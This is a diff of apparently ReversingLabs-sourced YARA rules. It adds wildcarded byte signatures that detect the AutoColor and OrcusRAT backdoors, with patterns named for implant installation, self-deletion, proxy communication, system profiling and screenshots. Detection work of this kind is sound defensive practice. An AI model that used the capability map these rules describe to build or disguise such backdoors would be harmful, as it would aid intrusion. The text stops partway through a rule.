 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6d1b47f3c9d7b90a5470f83a848adeebff2cf9341a1eb41ca8b45d08b469b17f"
+		logic_hash = "068d4d6916437197d4b3ac9c05803a35e15c00b0e70cb61ad6361981dc7cfee3"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "AutoColor"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$install_library_implant_p1 = {
+            F3 0F 1E FA 55 48 89 E5 41 54 53 48 81 EC ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48
+            89 45 ?? 31 C0 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48
+            8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 35
+            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C2 48
+            8D 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8
+            ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ??
+            48 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 48 8D 45 ?? 48 89 D6 48 89 C7 E8 ??
+            ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89
+            C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C2 48 8D 45 ?? 48 89 D6
+            48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8
+            ?? ?? ?? ?? 48 8D 45 ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48
+            89 C7 E8 ?? ?? ?? ?? 48 89 C2 48 8D 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45
+            ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 89 85 ??
+            ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ??
+            ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 DE 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7
+        }
+		$install_library_implant_p2 = {
+            E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ?? ?? ?? ?? EB ?? 8B 45 ??
+            4C 63 E0 48 8B 5D ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 4C 89 E2 48
+            89 DE 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 9D ??
+            ?? ?? ?? EB ?? BB ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89
+            C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ??
+            ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 D8 48 8B 4D ?? 64 48 33 0C 25 ?? ?? ??
+            ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? F3 0F 1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ??
+            ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F
+            1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D
+            45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ??
+            ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F
+            1E FA 48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? F3 0F 1E FA 48 89 C3 48 8D
+            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81
+            C4 ?? ?? ?? ?? 5B 41 5C 5D C3
+        }
+		$self_delete = {
+            F3 0F 1E FA 55 48 89 E5 53 48 83 EC ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 89 45 ?? 31 C0
+            48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 83
+            7D ?? ?? 74 ?? 8B 5D ?? EB ?? 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
+            ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 5D ?? EB ?? BB ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7
+            E8 ?? ?? ?? ?? 89 D8 48 8B 55 ?? 64 48 33 14 25 ?? ?? ?? ?? 74 ?? EB ?? F3 0F 1E FA
+            48 89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 83 C4 ?? 5B 5D C3
+        }
+		$execute_local_file_p1 = {
+            F3 0F 1E FA 55 48 89 E5 41 55 41 54 53 48 81 EC ?? ?? ?? ?? 48 83 0C 24 ?? 48 81 EC
+            ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 48 89 8D ?? ??
+            ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 89 45 ?? 31 C0 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8
+            ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
+            48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8D 9D ?? ?? ?? ?? 41 BC ?? ??
+            ?? ?? 49 89 DD 4D 85 E4 78 ?? 4C 89 EF E8 ?? ?? ?? ?? 49 83 C5 ?? 49 83 EC ?? EB ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 0F B6 C0 39 85 ?? ?? ?? ?? 7D ??
+            48 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 48 63 D2 48 C1 E2 ?? 48 01 C2 48 8B 85 ?? ??
+            ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? EB ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C2
+            48 8D 85 ?? ?? ?? ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 74 ?? E8 ?? ??
+            ?? ?? 8B 00 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 74
+            ?? 8B 85 ?? ?? ?? ?? 83 C8 ?? 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 89
+            DE 48 89 C7 E8 ?? ?? ?? ?? C1 E8 ?? 84 C0 74 ?? E8 ?? ?? ?? ?? 8B 00 89 85 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 88 ?? ??
+            ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 89
+        }
+		$execute_local_file_p2 = {
+            C7 E8 ?? ?? ?? ?? 39 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 88 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? BF
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 85 ?? ?? ?? ?? 7D ?? 8B 85 ?? ?? ?? ?? 89
+            C7 E8 ?? ?? ?? ?? 85 C0 83 85 ?? ?? ?? ?? ?? EB ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E8 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 78 ??
+            48 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 01 D0 0F B6 00 3C ?? 75 ?? 48 8B 85
+            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 48 63 D2 48 83 C2 ?? 48 01 C2 48 8D 85 ?? ?? ?? ?? 48
+            89 D6 48 89 C7 E8 ?? ?? ?? ?? EB ?? 83 85 ?? ?? ?? ?? ?? EB ?? 48 8B 85 ?? ?? ?? ??
+            48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
+            48 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 0F B6 C0 39
+            85 ?? ?? ?? ?? 7D ?? 8B 85 ?? ?? ?? ?? 8D 48 ?? 8B 85 ?? ?? ?? ?? 48 98 48 C1 E0 ??
+            48 8D 75 ?? 48 01 F0 48 2D ?? ?? ?? ?? 48 8B 10 48 63 C1 48 89 94 C5 ?? ?? ?? ?? 83
+        }
+		$execute_local_file_p3 = {
+            85 ?? ?? ?? ?? ?? EB ?? 0F B6 85 ?? ?? ?? ?? 0F B6 C0 83 C0 ?? 48 98 48 C7 84 C5 ??
+            ?? ?? ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C2 48 8D 85
+            ?? ?? ?? ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85
+            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8B 85
+            ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 41 89 C4 90 48
+            8D 9D ?? ?? ?? ?? 48 81 C3 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 39 C3 74 ?? 48 83 EB
+            ?? 48 89 DF E8 ?? ?? ?? ?? EB ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 44 89
+            E0 48 8B 4D ?? 64 48 33 0C 25 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? F3 0F 1E
+            FA 49 89 C5 48 85 DB 74 ?? B8 ?? ?? ?? ?? 4C 29 E0 48 C1 E0 ?? 4C 8D 24 03 49 39 DC
+            74 ?? 49 83 EC ?? 4C 89 E7 E8 ?? ?? ?? ?? EB ?? 4C 89 EB EB ?? F3 0F 1E FA 48 89 C3
+            48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 49 89 DC EB ?? F3 0F 1E FA 49 89 C4 48
+            8D 9D ?? ?? ?? ?? 48 81 C3 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 39 C3 74 ?? 48 83 EB
+            ?? 48 89 DF E8 ?? ?? ?? ?? EB ?? 4C 89 E3 EB ?? F3 0F 1E FA 48 89 C3 48 8D 85 ?? ??
+            ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81
+            C4 ?? ?? ?? ?? 5B 41 5C 41 5D 5D C3
+        }
+		$network_proxy_communication_p1 = {
+            F3 0F 1E FA 55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 83 0C 24 ?? 48 81 EC ?? ?? ?? ?? 48
+            89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48 89 45 ?? 31 C0
+            B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 89 D7 FC F3 48 AB 89 F8 89 CA
+            89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 8D 50 ?? 85 C0 0F 48
+            C2 C1 F8 ?? 89 C6 48 63 C6 48 8B BC C5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 99 C1
+            EA ?? 01 D0 83 E0 ?? 29 D0 BA ?? ?? ?? ?? 89 C1 48 D3 E2 48 89 D0 48 09 C7 48 89 FA
+            48 63 C6 48 89 94 C5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 8D 50 ?? 85 C0 0F 48 C2
+            C1 F8 ?? 89 C6 48 63 C6 48 8B BC C5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 99 C1 EA
+            ?? 01 D0 83 E0 ?? 29 D0 BA ?? ?? ?? ?? 89 C1 48 D3 E2 48 89 D0 48 09 C7 48 89 FA 48
+            63 C6 48 89 94 C5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 39 85 ?? ?? ??
+            ?? 7D ?? 48 8B 85 ?? ?? ?? ?? 8B 00 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 39
+            85 ?? ?? ?? ?? 7D ?? 48 8B 85 ?? ?? ?? ?? 8B 00 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            8D 78 ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 B9 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 48 89 C6 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
+            8B 00 8D 50 ?? 85 C0 0F 48 C2 C1 F8 ?? 48 98 48 8B B4 C5 ?? ?? ?? ?? 48 8B 85 ?? ??
+            ?? ?? 8B 00 99 C1 EA ?? 01 D0 83 E0 ?? 29 D0 BA ?? ?? ?? ?? 89 C1 48 D3 E2 48 89 D0
+        }
+		$network_proxy_communication_p2 = {
+            48 21 F0 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 48 8B
+            85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 D1 BA ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? E9 ?? ?? ?? ??
+            48 8B 85 ?? ?? ?? ?? 8B 00 8D 50 ?? 85 C0 0F 48 C2 C1 F8 ?? 48 98 48 8B B4 C5 ?? ??
+            ?? ?? 48 8B 85 ?? ?? ?? ?? 8B 00 99 C1 EA ?? 01 D0 83 E0 ?? 29 D0 BA ?? ?? ?? ?? 89
+            C1 48 D3 E2 48 89 D0 48 21 F0 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D
+            B5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 D1 BA ?? ?? ?? ?? 48 89
+            C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? EB
+            ?? 8B 95 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89
+            C7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? EB ?? 90 E9 ?? ?? ?? ?? 48 8B 4D ?? 64 48 33 0C 25 ?? ?? ?? ?? 74 ?? EB ??
+            F3 0F 1E FA 48 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C9 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RITEIL SERVIS, OOO" and pe.signatures [ i ] . serial == "04:8f:7b:5f:67:d8:e2:b3:03:0f:75:eb:7b:e2:71:3d" and 1591142400 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( all of ( $install_library_implant_p* ) ) and ( $self_delete ) and ( all of ( $execute_local_file_p* ) ) and ( all of ( $network_proxy_communication_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_082023879112289Bf351D297Cc8Efcfc : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Orcusrat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects OrcusRAT backdoor."
 		author = "ReversingLabs"
-		id = "94a4e3d6-2d0a-5e5d-9ae8-574ef9be017e"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "d4700cd1-73a4-552d-bc27-7408508a28e7"
+		date = "2024-09-10"
+		modified = "2024-09-10"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4816-L4832"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/ByteCode.MSIL.Backdoor.OrcusRAT.yara#L1-L134"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "58bec160445765ce45a26bf9d96ba6cfe61eee31e0953009d40a7ec64920c677"
+		logic_hash = "17a85613e9e4c862ce81fee49065c250381dbf8a50cf07d496f5fd2c1b82d92e"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Backdoor"
+		tc_detection_name = "OrcusRAT"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$get_tcp_connections = {
+            18 0B 16 0C 7E ?? ?? ?? ?? 12 ?? 17 07 1B 16 28 ?? ?? ?? ?? 0D 09 2C ?? 09 1F ?? 2E
+            ?? 72 ?? ?? ?? ?? 09 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 08 28 ?? ?? ??
+            ?? 13 ?? 11 ?? 12 ?? 17 07 1B 16 28 ?? ?? ?? ?? 0D 09 2C ?? 72 ?? ?? ?? ?? 09 8C ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? A5 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 8C ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 6A 58 28 ?? ?? ?? ?? 13 ?? 11 ?? 7B ?? ?? ?? ?? 8D ?? ?? ?? ?? 0A
+            16 13 ?? 2B ?? 11 ?? D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? A5 ?? ?? ?? ?? 13
+            ?? 06 11 ?? 11 ?? A4 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 8C ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 6A 58 28 ?? ?? ?? ?? 13 ?? 11 ?? 17 58 13 ?? 11 ?? 6A 11 ?? 7B ?? ?? ?? ?? 6E
+            32 ?? DE ?? 11 ?? 28 ?? ?? ?? ?? DC 06 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? (FE | 06)
+            ?? ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28
+        }
+		$get_operating_system_information_p1 = {
+            73 ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 0B 12 ?? (FE | 16) ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 0A 28 ?? ?? ?? ?? 0C 08 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 2B ??
+            06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 72
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 0D
+            09 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 09 (FE | 06) ??
+            ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 2F ?? 06 1C 8D ?? ?? ?? ??
+            25 16 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25
+            18 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A
+            11 ?? 8C ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 38 ??
+            ?? ?? ?? 06 1C 8D ?? ?? ?? ?? 25 16 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F
+        }
+		$get_operating_system_information_p2 = {
+            A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? 8C ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 25
+            1A 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 28 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 06 1A 8D ?? ?? ?? ?? 25 16 09 7B ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 09 7B ?? ?? ?? ?? 72 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26
+            06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 13 ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 72 ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 38 ?? ?? ?? ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 72 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 38 ?? ?? ?? ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 6F ?? ?? ?? ?? 72
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 38 ?? ?? ?? ?? 06
+            6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 2B ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 2B ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 2E ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33
+            ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 2E ?? 11
+            ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 2E ?? 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            2C ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 06 72
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 09 7B ?? ?? ?? ?? 2C ?? 09 7B ?? ?? ?? ?? 6F ?? ??
+            ?? ?? DC 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 11
+        }
+		$take_screenshot = {
+            28 ?? ?? ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 73 ??
